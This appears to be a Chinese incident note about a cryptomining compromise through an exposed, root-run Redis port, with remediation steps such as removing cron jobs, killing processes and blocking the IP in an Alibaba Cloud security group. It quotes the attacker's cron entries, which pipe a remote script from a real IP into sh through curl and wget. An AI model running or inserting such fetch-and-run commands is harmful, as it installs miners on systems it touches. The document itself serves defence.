背景
打开了redis的外网端口,redis是由root用户启动,所以入侵者拿到了root权限,在批处理中加入了两个定时任务,每5秒钟去远程代理服务器(美国)获取脚本。
分析
- 查看cpu使用率较高的进程 top -c,发现是调用了tmp下的一个文件,tmp下公有多个可疑文件。
- crontab -l查看,发现有两个定时任务,/5 curl -fsSL http://165.225.157.157:8000/i.sh | sh*; /5 wget -q -O- http://165.225.157.157:8000/i.sh | sh*,浏览器访问下这两个地址,可以看到是一段shell,也就是挖矿脚本。
- 删除tmp下的可疑文件,停止批处理之后,一段时间之后依然会cpu100%,说明这个ip依然会攻击,在阿里云配置安全组,阻止165.225.157.157即可。
处理方案
参考地址:https://blog.csdn.net/u012259256/article/details/79840356
- 进入阿里云控制台,在实例列表中选择被攻击的实例,配置安全组,在公网入站出站规则中禁止165.225.157.157即可。
- crontab -r,删除批处理
- 删除tmp下可疑文件
- top -c,杀掉cpu负载较高的进程。
- 检查其它所有有可能开放公网可能的阿里云实例,都应该配置安全组。
```